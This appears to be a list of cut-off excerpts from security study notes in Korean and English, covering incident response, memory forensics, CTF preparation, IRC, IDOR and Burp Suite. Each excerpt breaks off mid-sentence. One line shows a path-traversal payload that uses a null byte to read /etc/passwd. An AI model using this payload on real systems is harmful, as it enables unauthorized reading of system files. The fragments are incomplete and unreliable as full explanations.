파이썬의 subprocess 모듈은 새로운 프로세스를 생성하고, 그 프로세스의 입력/출력 파이프에 연결하며, 반환 코드(return code)를 얻는 데 사용됩니다. 즉, 파이썬 스크립트 내에서 외부 셸 명령어(Shell Command)나 다른 프로그램(Program)

Disk image: The disk image contains all the data present on the storage device of the system (HDD, SSD, etc.). This data is non-volatile, meaning that
Remember we studied the second phase of the incident response lifecycle, ‘Identification’ in SANS, and ‘Detection and Analysis’ in NIST. It is very ha
A Playbook is a detailed, step-by-step guide that defines how to detect, analyze, respond to, and recover from a specific type of cybersecurity incide
Volatility 3는 메모리 포렌식을 위한 Python 기반 프레임워크입니다. 메모리 이미지에서 프로세스, 네트워크 연결, DLL, 명령행 등 런타임 상태를 추출합니다. 설치/사용 정보와 공식 문서는 Volatility 재단 GitHub 및 ReadTheDocs 문
FlareVM, or "Forensics, Logic Analysis, and Reverse Engineering," stands out as a comprehensive and carefully curated collection of specialized tools
CTF (Capture The Flag) 대회에 혼자 출전하시려는 계획은 정말 도전적이고 멋진 일입니다! 혼자 대회를 완주하는 것은 실력 향상에 엄청난 도움이 됩니다.혼자서도 성공적으로 CTF를 완주하고, 특히 앞서 논의했던 포렌식(Forensics) 및 리버스 엔지니

CGIIRC (Common Gateway Interface Internet Relay Chat) 는웹 브라우저를 통해 IRC(Internet Relay Chat) 네트워크에 접속할 수 있도록 해주는 웹 기반 IRC 클라이언트(Web-based IRC Client) 입니
IRC는 실시간 텍스트 기반 통신을 위해 설계된 채팅 프로토콜입니다.1988년 Jarkko Oikarinen가 만든 초기 실시간 채팅 시스템으로, 전 세계 사용자들이 채널(Channel) 단위로 대화 가능.주로 TCP (Transmission Control Protoc
사용자 브라우저CGIIRC 웹 페이지 접속 → IRC 채널, 닉네임, 서버 선택 폼 입력입력값은 HTTP POST/GET 방식으로 웹 서버에 전달웹 서버Apache, Nginx 등 CGI 지원 서버HTTP 요청을 CGI 스크립트로 전달 (환경 변수 + 입력값)CGI 스
Examining and editing the cookies set by the web server during your online session can have multiple outcomes, such as unauthenticated access, access
If the Id cannot be detected using the above methods, an excellent method of IDOR detection is to create two accounts and swap the Id numbers between
include("languages/../../../../../etc/passwd%00").".php");


In essence, Burp Suite Repeater enables us to modify and resend intercepted requests to a target of our choosing. It allows us to take requests captur
The Positions tab of Burp Suite Intruder has a dropdown menu for selecting the attack type. Intruder offers four attack types, each serving a specific
Burp Suite (버프 스위트)의 Intruder (인투루더) 도구는 웹 애플리케이션 보안 테스트에서 반복적인 맞춤형 공격(Automated Custom Attacks)을 수행하는 핵심 모듈입니다. Intruder가 제공하는 다양한 공격 유형 중 Pitchfork는